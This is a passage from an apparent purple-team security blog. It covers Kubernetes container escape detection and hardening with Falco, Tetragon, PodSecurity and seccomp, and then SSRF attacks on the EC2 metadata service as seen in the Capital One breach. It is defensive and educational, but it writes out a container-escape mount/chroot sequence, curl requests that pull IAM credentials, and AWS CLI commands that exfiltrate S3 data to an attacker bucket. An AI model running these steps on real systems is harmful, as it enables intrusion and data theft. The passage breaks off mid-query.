     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
  desc: >
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: >
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: >
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.source
     mount_target=%evt.arg.target
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: >
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: >
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: >
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: >
    A process inside a container is reading /proc entries for PIDs
    that don't belong to it — indicates hostPID=true and enumeration.
  condition: >
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: >
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]

Tetragon: TracingPolicy for nsenter and Mount Syscalls

Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco which uses a single tracepoint aggregation model, Tetragon can enforce at the kernel level — it can block a syscall before it completes, not just alert after the fact.

# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
  namespace: kube-system
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: "sys_mount"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # source device (e.g. /dev/sda1)
        - index: 1
          type: "string"     # target mount point
        - index: 2
          type: "string"     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - "host_pid_ns"   # Replace with actual host PID NS value
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: __x64_sys_execve for nsenter binary
    - call: "__x64_sys_execve"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/nsenter"
          matchActions:
          - action: Post

  # Hook 3: write to /proc/self/exe — runc CVE class indicator
  kprobes:
    - call: "vfs_write"
      return: false
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/proc/self/exe"
          matchActions:
          - action: Sigkill   # Block immediately — no legitimate use case for this write

bpftrace: Quick Node-Level Validation

Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:

# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
  printf("%-8d %-20s %-30s -> %-30s type=%s\n",
    pid, comm,
    str(args->dev_name),   // source device
    str(args->dir_name),   // mount target
    str(args->type));      // filesystem type
}
' 2>/dev/null
# Sample output:
# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress

# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  if (str(args->filename) == "/usr/bin/nsenter" ||
      str(args->filename) == "/bin/nsenter") {
    printf("nsenter called: pid=%d ppid=%d comm=%s\n",
      pid, curtask->real_parent->pid, comm);
  }
}
' 2>/dev/null

What Kubernetes Audit Logs Show (and What They Miss)

Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.

# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods"]
    verbs: ["create", "update", "patch"]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods/exec"]
    verbs: ["create"]

# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
  jq -r '[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + "/" + .objectRef.name,
    "privileged=true"
  ] | join(" | ")'

# Or via kubectl (if audit log backend is configured)
kubectl get events -A --field-selector reason=Created \
  -o json | \
  jq -r '.items[] |
    select(.message | contains("privileged")) |
    [.metadata.namespace, .involvedObject.name, .message] |
    join(" / ")'

The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pod/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.

Purple Phase: Structural Fixes

Fix 1: PodSecurity Admission — Enforce Restricted Profile

PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.

# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # enforce: pod is rejected at admission if spec violates Restricted
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # audit: violations are logged but not rejected (useful for rollout)
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    # warn: user gets a warning but pod is allowed (for migration)
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

What Restricted profile blocks (relevant to escape paths):

# These settings are REQUIRED by Restricted — apply them explicitly
# to avoid the admission webhook rejecting your workloads

securityContext:
  # Pod-level
  runAsNonRoot: true
  seccompProfile:
    type: RuntimeDefault    # or Localhost with a custom profile

containers:
  - securityContext:
      allowPrivilegeEscalation: false
      privileged: false          # blocks Path 1
      capabilities:
        drop: ["ALL"]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
        add: []                  # add only what is specifically required
      readOnlyRootFilesystem: true  # reduces attacker persistence options

# Pod spec — blocked by Restricted
spec:
  hostPID: false           # must be false (blocks Path 2)
  hostNetwork: false       # must be false
  hostIPC: false           # must be false
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not

Rollout approach for existing clusters:

Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:

# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r '.items[] |
    select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
    .metadata.name' | \
  while read ns; do
    kubectl label namespace "$ns" \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo "Labeled $ns"
  done

# After a deployment cycle, check for warnings in admission logs
# Look for pods that would be rejected under enforce mode
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r '.items[] | select(.message | contains("violates PodSecurity"))'

Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads

For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a hypervisor-level runtime.

gVisor and Kata Containers intercept system calls at a layer between the container and the Linux kernel, so a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.

# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: "true"   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor's sentry
  containers:
    - name: app
      image: untrusted-image:latest

# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu

For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.

Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape

Even without gVisor, a custom seccomp profile that explicitly denies mount, unshare, and clone with namespace flags closes the primary escape syscall surface.

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": [
        "accept", "accept4", "access", "arch_prctl",
        "bind", "brk", "capget", "capset",
        "chdir", "chmod", "chown", "clock_gettime",
        "clone",
        "close", "connect",
        "dup", "dup2", "dup3",
        "execve", "exit", "exit_group",
        "fchmod", "fchown", "fcntl",
        "fstat", "fstatfs", "fsync",
        "futex", "getcwd", "getdents64",
        "getegid", "geteuid", "getgid", "getgroups",
        "getpeername", "getpid", "getppid",
        "getrlimit", "getsockname", "getsockopt",
        "gettid", "gettimeofday", "getuid",
        "inotify_add_watch", "inotify_init1",
        "listen", "lseek", "lstat",
        "madvise", "mmap", "mprotect",
        "munmap", "nanosleep",
        "open", "openat",
        "pipe", "pipe2", "poll", "ppoll",
        "prctl", "pread64", "pwrite64",
        "read", "readlink", "readv",
        "recvfrom", "recvmsg", "recvmmsg",
        "rename", "rt_sigaction", "rt_sigprocmask",
        "rt_sigreturn", "sched_getaffinity",
        "select", "sendfile", "sendmsg", "sendto",
        "set_robust_list", "set_tid_address",
        "setgid", "setgroups", "setuid",
        "setsockopt", "shutdown",
        "socket", "socketpair",
        "stat", "statfs", "symlink",
        "tgkill", "time", "timerfd_create",
        "timerfd_settime", "truncate",
        "uname", "unlink", "unlinkat",
        "wait4", "waitid",
        "write", "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}

Apply via pod spec:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "container-escape-block.json"
      # Profile must be in /var/lib/kubelet/seccomp/ on each node

# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault which blocks ~300 dangerous syscalls)

# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault

Fix 4: Network Policy — Contain the Blast Radius After Escape

Even if a container escapes to the node, a network policy that prevents the escaped process from reaching the Kubernetes API server limits what the attacker can do with node credentials.

# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence — egress to control plane falls through to default deny

# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # Add specific rules above this as needed

Fix 5: Node Isolation — Co-location Risk

An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.

# Use node selectors, taints, and tolerations to separate workload tiers

# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule

⚠ Production Gotchas

Legitimate workloads that require –privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Baseline or Privileged policy and compensate with Falco detection and node isolation.

Seccomp Restricted blocks some monitoring agents. The default Restricted seccomp profile blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.

runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.

hostPath volumes are a partial equivalent to –privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. PodSecurity Restricted blocks hostPath entirely; Baseline allows it. Audit for hostPath volumes separately from --privileged.

RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.

Quick Reference

Escape Path	Precondition	Detection Signal	Structural Fix
Privileged container → mount	`privileged: true`	Falco: mount syscall from container; Tetragon: sys_mount kprobe	PodSecurity Restricted enforce; seccomp blocks mount
hostPID + nsenter	`hostPID: true`	Falco: nsenter exec in container; audit log: pod creation with hostPID	PodSecurity Restricted; blocks hostPID
hostNetwork + IMDS	`hostNetwork: true`	CloudTrail: IMDSv1 call from unexpected source	Enforce IMDSv2 hop limit 1; PodSecurity Restricted
runc CVE (CVE-2019-5736)	Unpatched runc	Tetragon: vfs_write to /proc/self/exe	Patch runc/containerd; use RuntimeClass (gVisor)
hostPath volume mount	hostPath to sensitive path	Falco: sensitive host file access; PodSecurity audit	PodSecurity Restricted (blocks hostPath)
Escaped → API server	Node credential access	Audit log: API calls from node IP at unexpected time	Network policy blocking node→API server egress

Key Takeaways

Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags
Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash — this is not a sophisticated exploit, it is a default kernel behavior
eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials

What’s Next

Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.

Get EP09 in your inbox when it publishes → subscribe at linuxcent.com

SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach

June 22, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes

What Is Purple Team? → OWASP Top 10 Cloud → Breach Landscape 2020–2025 → Broken Access Control → MFA Fatigue → CI/CD Secrets → SSRF to Cloud Metadata

TL;DR

SSRF cloud metadata attack is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach 169.254.169.254 — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication
IMDSv1 (the default before 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials — SSRF anywhere in the stack is sufficient
Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement
IMDSv2 requires a PUT request to obtain a session token first — a CSRF/SSRF-blocked flow — making the IMDS resistant to standard SSRF exploitation; --http-tokens required is the one-line enforcement
Hop limit of 1 is the container-layer defense: it prevents any process inside a container from reaching IMDS because the TTL expires before the packet traverses the additional network layer
The structural fix is eliminating the credential entirely: OIDC workload identity eliminates static credentials replaces the attached IAM role with a dynamically issued, scoped token — no IMDS credential to steal

OWASP Mapping: A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can't follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

The SSRF cloud metadata attack chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.

The Incident: Capital One (2019)

In March 2019, a misconfigured WAF at Capital One was running on AWS EC2. The WAF was a commercial product deployed in an EC2 instance with an attached IAM role — standard practice, necessary for the WAF to interact with other AWS services.

The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF’s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.

The attack chain, reconstructed from court documents and Capital One’s public disclosures:

1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: "capital-one-waf-role" (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers

IMDSv1 required no authentication. The WAF’s attached IAM role had s3:GetObject and s3:ListBucket permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.

Capital One paid a $190M settlement. AWS did not change IMDSv1 as a result — they had already released IMDSv2 in November 2019, months after the breach was discovered (July 2019). The breach timeline predates IMDSv2 availability. What it demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.

The revelation that the industry took away: IMDSv1 has no authentication. Any SSRF vulnerability anywhere in your stack — in the application, in a WAF, in a sidecar, in a Lambda calling your EC2 — is a straight line to your IAM role credentials. The SSRF doesn’t need to be severe or complex. It just needs to reach 169.254.169.254.

Red Phase: How the Attack Works

What SSRF Is

Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker’s choosing. The server acts as a proxy: the request originates from the server’s network context, not the attacker’s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.

SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:
– Image URL upload/preview (e.g., “fetch this avatar URL”)
– Webhook configuration (server calls a URL you provide)
– PDF generation from URL
– Reverse proxies and WAFs with request-forwarding rules
– Server-side URL validation endpoints

Why the Metadata Endpoint Is the Target

169.254.169.254 is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.

The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.

# (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what's available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole

The response from Step 2 looks like this:

{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY",
  "Token": "FQoDYXdzEJr//////////wEa...very-long-session-token...==",
  "Expiration": "2019-03-22T24:03:30Z"
}

These are real, valid AWS temporary credentials. The Token field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.

The Full Attack Chain

Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:

Step 1: Confirm the SSRF and find the metadata endpoint

# Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed

Step 2: Exfiltrate credentials via SSRF

# Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON

Step 3: Use credentials from attacker’s system

# Export the stolen credentials
export AWS_ACCESS_KEY_ID="ASIAQFAKEKEYIDEXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY"
export AWS_SESSION_TOKEN="FQoDYXdzEJr...=="

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid

{
    "UserId": "AROAQFAKEUSERID:i-01234567890abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
}

Step 4: Enumerate and exfiltrate

# List all accessible S3 buckets
aws s3 ls
# Output: all buckets the role has s3:ListBucket on

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

# Check what IAM actions are allowed (enumerate permissions)
aws iam simulate-principal-policy \
  --policy-source-arn "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0" \
  --action-names "s3:GetObject" "s3:PutObject" "ec2:DescribeInstances" "iam:ListRoles" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/

Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances

Before running detection controls, confirm which of your instances are still vulnerable:

# Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'

[
    {
        "State": "applied",
        "HttpTokens": "optional",           ← "optional" means IMDSv1 is still enabled
        "HttpPutResponseHopLimit": 1,
        "HttpEndpoint": "enabled",
        "HttpProtocolIpv6": "disabled",
        "InstanceMetadataTags": "disabled"
    }
]

"HttpTokens": "optional" means IMDSv1 is still active. Any SSRF in the instance’s software stack can reach these credentials without a token.

# Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }' \
  --output table | \
  grep -E "optional|INSTANCE"
# Any row showing "optional" is IMDSv1-exposed

Blue Phase: Detection

What CloudTrail Logs When IMDS Credentials Are Abused

The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker’s use of the stolen credentials is what generates logs. The key signal is GetCallerIdentity from an unusual source IP paired with the instance role’s ARN appearing in CloudTrail from an IP that is not the instance itself.

# Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE="MyApplicationRole"
INSTANCE_IP="10.0.1.50"  # Your instance's known IP

aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].CloudTrailEvent' \
  --output text | \
  jq -r 'fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == "'"${DETECTOR_ROLE}"'") |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }' | \
  jq "select(.sourceIP != \"${INSTANCE_IP}\")"
  # Any result here = role credentials being used from outside the instance

The tell: the userIdentity.arn will contain the instance ID as the role session name (e.g., assumed-role/MyApplicationRole/i-01234567890abcdef0). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.

GuardDuty: The Purpose-Built Finding

GuardDuty has a specific finding for exactly this scenario:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely — meaning someone has physically exfiltrated the credentials to their own system and is using them from there.

# Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.NetworkConnectionAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
